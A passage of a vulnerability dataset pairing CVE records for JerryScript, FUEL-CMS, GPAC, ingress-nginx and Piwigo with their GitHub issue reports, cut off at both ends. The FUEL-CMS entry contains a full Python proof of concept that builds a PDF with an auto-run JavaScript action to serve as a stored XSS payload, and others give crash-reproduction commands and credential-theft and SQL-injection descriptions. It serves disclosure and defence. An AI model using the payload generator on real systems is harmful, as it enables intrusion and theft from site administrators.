../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007f45b1399859 in __GI_abort () at abort.c:79 #2 0x00005574cdd6736f in jerry_port_fatal (code=ERR_FAILED_INTERNAL_ASSERTION) at /jerryscript/jerry-port/default/default-fatal.c:30 #3 0x00005574cdcff841 in jerry_fatal (code=ERR_FAILED_INTERNAL_ASSERTION) at /jerryscript/jerry-core/jrt/jrt-fatals.c:63 #4 0x00005574cdcff897 in jerry_assert_fail (assertion=0x5574cdd73de8 "JERRY_CONTEXT (jmem_heap_allocated_size) == 0", file=0x5574cdd73d60 "/jerryscript/jerry-core/jmem/jmem-heap.c", function=0x5574cdd8bce0 <__func__.6665> "jmem_heap_finalize", line=107) at /jerryscript/jerry-core/jrt/jrt-fatals.c:87 #5 0x00005574cdcfe8a0 in jmem_heap_finalize () at /jerryscript/jerry-core/jmem/jmem-heap.c:107 #6 0x00005574cdcfe5d7 in jmem_finalize () at /jerryscript/jerry-core/jmem/jmem-allocator.c:170 #7 0x00005574cdca9aaf in jerry_cleanup () at /jerryscript/jerry-core/api/jerry.c:232 #8 0x00005574cdca73b4 in main (argc=2, argv=0x7ffffff6d468) at /jerryscript/jerry-main/main-jerry.c:371 #9 0x00007f45b139b0b3 in __libc_start_main (main=0x5574cdca6889 <main>, argc=2, argv=0x7ffffff6d468, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7ffffff6d458) at ../csu/libc-start.c:308 #10 0x00005574cdca67ce in _start () ``` ###### Expected behavior According to our analysis, the root cause of this assertion failed is at /jerryscript/jerry-core/ecma/ecma-regexp-object.c:3497. While getting next_set_status, function ecma-op-object-put() called function ecma_make_length_value(index), which alloc a 8-bit chunk memory use as a float number if index is larger than 0x7ffffff. This chunk is not freed, causing assertion failed. To repair, ecma_make_length_value(index) should be replaced by last_index created by ecma-regexp-object.c:3496.
Unfreed float causing memory leak in ecma-regexp-object
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4781/comments
2
2021-09-27T07:23:09Z
2021-10-04T11:12:53Z
https://github.com/jerryscript-project/jerryscript/issues/4781
1,007,794,199
4,781
CVE-2022-28599
2022-05-03T18:15:08.983
A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS 1.5.1 that allows an authenticated user to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/daylightstudio/FUEL-CMS/issues/595" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "F3A806A2-582F-49B6-B9EC-C0FB4B13ED3D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/daylightstudio/FUEL-CMS/issues/595
[ "Exploit", "Third Party Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack. 1、login as admin .in the Assets page ![image](https://user-images.githubusercontent.com/42400388/161377109-206997ec-f92a-4ac9-ae0e-9f7645068630.png) 2、Use the following PoC to generate malicious files : ``` # FROM https://github.com/osnr/horrifying-pdf-experiments import sys from pdfrw import PdfWriter from pdfrw.objects.pdfname import PdfName from pdfrw.objects.pdfstring import PdfString from pdfrw.objects.pdfdict import PdfDict from pdfrw.objects.pdfarray import PdfArray def make_js_action(js): action = PdfDict() action.S = PdfName.JavaScript action.JS = js return action def make_field(name, x, y, width, height, r, g, b, value=""): annot = PdfDict() annot.Type = PdfName.Annot annot.Subtype = PdfName.Widget annot.FT = PdfName.Tx annot.Ff = 2 annot.Rect = PdfArray([x, y, x + width, y + height]) annot.MaxLen = 160 annot.T = PdfString.encode(name) annot.V = PdfString.encode(value) # Default appearance stream: can be arbitrary PDF XObject or # something. Very general. annot.AP = PdfDict() ap = annot.AP.N = PdfDict() ap.Type = PdfName.XObject ap.Subtype = PdfName.Form ap.FormType = 1 ap.BBox = PdfArray([0, 0, width, height]) ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0]) ap.stream = """ %f %f %f rg 0.0 0.0 %f %f re f """ % (r, g, b, width, height) # It took me a while to figure this out. See PDF spec: # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641 # Basically, the appearance stream we just specified doesn't # follow the field rect if it gets changed in JS (at least not in # Chrome). # But this simple MK field here, with border/color # characteristics, _does_ follow those movements and resizes, so # we can get moving colored rectangles this way. annot.MK = PdfDict() annot.MK.BG = PdfArray([r, g, b]) return annot def make_page(fields, script): page = PdfDict() page.Type = PdfName.Page page.Resources = PdfDict() page.Resources.Font = PdfDict() page.Resources.Font.F1 = PdfDict() page.Resources.Font.F1.Type = PdfName.Font page.Resources.Font.F1.Subtype = PdfName.Type1 page.Resources.Font.F1.BaseFont = PdfName.Helvetica page.MediaBox = PdfArray([0, 0, 612, 792]) page.Contents = PdfDict() page.Contents.stream = """ BT /F1 24 Tf ET """ annots = fields page.AA = PdfDict() # You probably should just wrap each JS action with a try/catch, # because Chrome does no error reporting or even logging otherwise; # you just get a silent failure. page.AA.O = make_js_action(""" try { %s } catch (e) { app.alert(e.message); } """ % (script)) page.Annots = PdfArray(annots) return page if len(sys.argv) > 1: js_file = open(sys.argv[1], 'r') fields = [] for line in js_file: if not line.startswith('/// '): break pieces = line.split() params = [pieces[1]] + [float(token) for token in pieces[2:]] fields.append(make_field(*params)) js_file.seek(0) out = PdfWriter() out.addpage(make_page(fields, js_file.read())) out.write('result.pdf') ``` ![image](https://user-images.githubusercontent.com/42400388/161377133-c96017a7-dc1a-4bc9-b8bb-52dd24229c19.png) 3、back to Assets then we can see xss-cookie.svg have been upload: ![image](https://user-images.githubusercontent.com/42400388/161376709-b021eb00-8064-4803-8c67-484a2b3689a8.png) 4、when user click the xss.pdf it will trigger a XSS attack ![image](https://user-images.githubusercontent.com/42400388/161377067-6809e5d8-f9ec-4098-b282-0324029937a9.png)
A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/595/comments
0
2022-04-02T09:29:18Z
2022-04-02T09:38:57Z
https://github.com/daylightstudio/FUEL-CMS/issues/595
1,190,577,090
595
CVE-2022-29339
2022-05-05T13:15:07.927
In GPAC 2.1-DEV-rev87-g053aae8-master, function BS_ReadByte() in utils/bitstream.c has a failed assertion, which causes a Denial of Service. This vulnerability was fixed in commit 9ea93a2.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/9ea93a2ec8f555ceed1ee27294cf94822f14f10f" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2165" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "A97931ED-0014-4D2C-969E-5B41DDFF9DD2", "versionEndExcluding": "2022-04-12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2165
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
**version info:** ``` root@d8a714203f6e:# ./MP4Box -version MP4Box - GPAC version 2.1-DEV-rev87-g053aae8-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/path_to_gpac/build --enable-debug --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FAAD GPAC_HAS_MAD GPAC_HAS_LIBA52 GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_JP2 GPAC_HAS_THEORA GPAC_HAS_VORBIS GPAC_HAS_XVID GPAC_HAS_LINUX_DVB ``` **poc:** [poc](https://github.com/dandanxu96/PoC/raw/main/gpac/gpac-BS_ReadByte-Assertion-failed-poc) **command:** MP4Box -hint -out /dev/null $poc$ **crash:** ``` root@d8a714203f6e:# ./MP4Box -hint -out /dev/null poc [iso file] Unknown box type a}EF95 [iso file] Unknown box type a}EF95 [iso file] Unknown box type a}EF95 [iso file] Box "abst" (start 4730) has 79 extra bytes [BS] Attempt to overread bitstream MP4Box: utils/bitstream.c:383: BS_ReadByte: Assertion `bs->position<=bs->size' failed. Aborted ```
Assertion failed in BS_ReadByte, utils/bitstream.c:383
https://api.github.com/repos/gpac/gpac/issues/2165/comments
0
2022-04-08T08:28:19Z
2022-04-12T09:01:22Z
https://github.com/gpac/gpac/issues/2165
1,197,007,820
2,165
CVE-2022-29340
2022-05-05T13:15:07.967
GPAC 2.1-DEV-rev87-g053aae8-master. has a Null Pointer Dereference vulnerability in gf_isom_parse_movie_boxes_internal due to improper return value handling of GF_SKIP_BOX, which causes a Denial of Service. This vulnerability was fixed in commit 37592ad.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/37592ad86c6ca934d34740012213e467acc4a3b0" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2163" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "A97931ED-0014-4D2C-969E-5B41DDFF9DD2", "versionEndExcluding": "2022-04-12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2163
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
**version info:** ``` root@d8a714203f6e:# ./MP4Box -version MP4Box - GPAC version 2.1-DEV-rev87-g053aae8-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/path_to_gpac/build --enable-debug --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FAAD GPAC_HAS_MAD GPAC_HAS_LIBA52 GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_JP2 GPAC_HAS_THEORA GPAC_HAS_VORBIS GPAC_HAS_XVID GPAC_HAS_LINUX_DVB ``` **poc:**[poc](https://github.com/dandanxu96/PoC/raw/main/gpac/gpac-gf_isom_parse_movie_boxes-null-pointer-dereference-poc) **command:** MP4Box -hint -out /dev/null $poc$ **crash:** ``` root@d8a714203f6e:# ./MP4Box -hint -out /dev/null poc [iso file] Read Box type 00000000 (0x00000000) at position 45 has size 0 but is not at root/file level. Forbidden, skipping end of parent box ! [iso file] Read Box "abst" (start 0) failed (Unknown Error (10)) - skipping isomedia/isom_intern.c:392:12: runtime error: member access within null pointer of type 'struct GF_Box' ``` When `size=0` and `is_root_box=false`, `gf_isom_box_parse_ex` will return `GF_SKIP_BOX` (i.e., 10) at line 138 of box_funcs.c. https://github.com/gpac/gpac/blob/7f060bbb72966cae80d6fee338d0b07fa3fc06e1/src/isomedia/box_funcs.c#L129-L142 This will cause `*outBox` to be set to NULL (in box_funcs.c:312) and the return value `GF_SKIP_BOX` will be passed to the upper function ( in box_funcs.c:318). https://github.com/gpac/gpac/blob/7f060bbb72966cae80d6fee338d0b07fa3fc06e1/src/isomedia/box_funcs.c#L310-L319 The program now executes the empty if block when `e>=0`( in isom_intern.c:375-377), and later dereferences the null pointer in line 392 of isom_intern.c. https://github.com/gpac/gpac/blob/7f060bbb72966cae80d6fee338d0b07fa3fc06e1/src/isomedia/isom_intern.c#L373-L392 Note that although the crash path is the same as in issue #2155, their root cause is different.
NULL Pointer Dereference still exists in gf_isom_parse_movie_boxes_internal
https://api.github.com/repos/gpac/gpac/issues/2163/comments
1
2022-04-01T12:17:54Z
2022-04-12T09:01:21Z
https://github.com/gpac/gpac/issues/2163
1,189,714,047
2,163
CVE-2021-25745
2022-05-06T01:15:09.047
A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the spec.rules[].http.paths[].path field of an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 4.7, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/ingress-nginx/issues/8502" }, { "source": "[email protected]", "tags": [ "Issue Tracking", "Mailing List", "Mitigation", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/7vQrpDZeBlc" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220609-0006/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*", "matchCriteriaId": "7DD01B7D-743B-41AF-9D8F-D8C6038E6BD0", "versionEndExcluding": "1.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/ingress-nginx/issues/8502
[ "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "ingress-nginx" ]
### Issue Details A security issue was discovered in [ingress-nginx](https://github.com/kubernetes/ingress-nginx) where a user that can create or update ingress objects can use the `spec.rules[].http.paths[].path` field of an Ingress object (in the `networking.k8s.io` or `extensions` API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster. This issue has been rated **High** ([CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L)), and assigned **CVE-2021-25745**. ### Affected Components and Configurations This bug affects ingress-nginx. If you do not have ingress-nginx installed on your cluster, you are not affected. You can check this by running `kubectl get po -n ingress-nginx`. Multitenant environments where non-admin users have permissions to create Ingress objects are most affected by this issue. #### Affected Versions - <v1.2.0 #### Fixed Versions - v1.2.0-beta.0 - v1.2.0 ### Mitigation If you are unable to roll out the fix, this vulnerability can be mitigated by implementing an admission policy that restricts the `spec.rules[].http.paths[].path` field on the `networking.k8s.io/Ingress` resource to known safe characters (see the newly added [rules](https://github.com/kubernetes/ingress-nginx/blame/main/internal/ingress/inspector/rules.go), or the suggested value for [annotation-value-word-blocklist](https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/#annotation-value-word-blocklist)). ### Detection If you find evidence that this vulnerability has been exploited, please contact [[email protected]](mailto:[email protected]) Additional Details See ingress-nginx Issue [#8502](https://github.com/kubernetes/ingress-nginx/issues/8502) for more details. ### Acknowledgements This vulnerability was reported by Gafnit Amiga. Thank You, CJ Cullen on behalf of the Kubernetes Security Response Committee
CVE-2021-25745: Ingress-nginx `path` can be pointed to service account token file
https://api.github.com/repos/kubernetes/ingress-nginx/issues/8502/comments
11
2022-04-22T16:18:21Z
2022-05-10T16:07:36Z
https://github.com/kubernetes/ingress-nginx/issues/8502
1,212,547,655
8,502
CVE-2021-25746
2022-05-06T01:15:09.180
A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use .metadata.annotations in an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 4.2, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 4.7, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/ingress-nginx/issues/8503" }, { "source": "[email protected]", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/hv2-SfdqcfQ" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220609-0006/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*", "matchCriteriaId": "7DD01B7D-743B-41AF-9D8F-D8C6038E6BD0", "versionEndExcluding": "1.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/ingress-nginx/issues/8503
[ "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "ingress-nginx" ]
### Issue Details A security issue was discovered in [ingress-nginx](https://github.com/kubernetes/ingress-nginx) where a user that can create or update ingress objects can use `.metadata.annotations` in an Ingress object (in the `networking.k8s.io` or `extensions` API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster. This issue has been rated **High** ([CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L)), and assigned **CVE-2021-25746**. ### Affected Components and Configurations This bug affects ingress-nginx. If you do not have ingress-nginx installed on your cluster, you are not affected. You can check this by running `kubectl get po -n ingress-nginx`. Multitenant environments where non-admin users have permissions to create Ingress objects are most affected by this issue. #### Affected Versions - <v1.2.0 #### Fixed Versions - v1.2.0-beta.0 - v1.2.0 ### Mitigation If you are unable to roll out the fix, this vulnerability can be mitigated by implementing an admission policy that restricts the `metadata.annotations` values to known safe (see the newly added [rules](https://github.com/kubernetes/ingress-nginx/blame/main/internal/ingress/inspector/rules.go), or the suggested value for [annotation-value-word-blocklist](https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/#annotation-value-word-blocklist)). ### Detection If you find evidence that this vulnerability has been exploited, please contact [[email protected]](mailto:[email protected]) ### Additional Details See ingress-nginx Issue [#8503](https://github.com/kubernetes/ingress-nginx/issues/8503) for more details. ### Acknowledgements This vulnerability was reported by Anthony Weems, and separately by jeffrey&oliver. Thank You, CJ Cullen on behalf of the Kubernetes Security Response Committee
CVE-2021-25746: Ingress-nginx directive injection via annotations
https://api.github.com/repos/kubernetes/ingress-nginx/issues/8503/comments
10
2022-04-22T16:18:27Z
2022-05-10T16:12:39Z
https://github.com/kubernetes/ingress-nginx/issues/8503
1,212,547,731
8,503
CVE-2020-19212
2022-05-06T14:15:08.217
SQL Injection vulnerability in admin/group_list.php in piwigo v2.9.5, via the group parameter to delete.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1009" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "4803EBB7-FB18-4FB3-A3B1-A476BB2E20AF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1009
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
An SQL injection has been discovered in the administration panel of Piwigo v2.9.5. The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query and display. This could result in full information disclosure. The vulnerability was found in the 'delete' method in admin/group_list.php, because it does not validate and filter the '$group' parameter when it gets the parameters. And the vulnerability could query any data in the database and display it on the page. In the figure, I obtained the encrypted password of the user table. ![2](https://user-images.githubusercontent.com/34082644/57190820-617b1080-6f51-11e9-9d69-df2a0d6cd5a9.png) ![3](https://user-images.githubusercontent.com/34082644/57190823-65a72e00-6f51-11e9-9645-9bc19a7a6337.png)
SQL injection in group_list.php
https://api.github.com/repos/Piwigo/Piwigo/issues/1009/comments
1
2019-05-05T08:40:59Z
2019-08-12T12:26:39Z
https://github.com/Piwigo/Piwigo/issues/1009
440,418,682
1,009
CVE-2020-19213
2022-05-06T14:15:08.267
SQL Injection vulnerability in cat_move.php in piwigo v2.9.5, via the selection parameter to move_categories.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 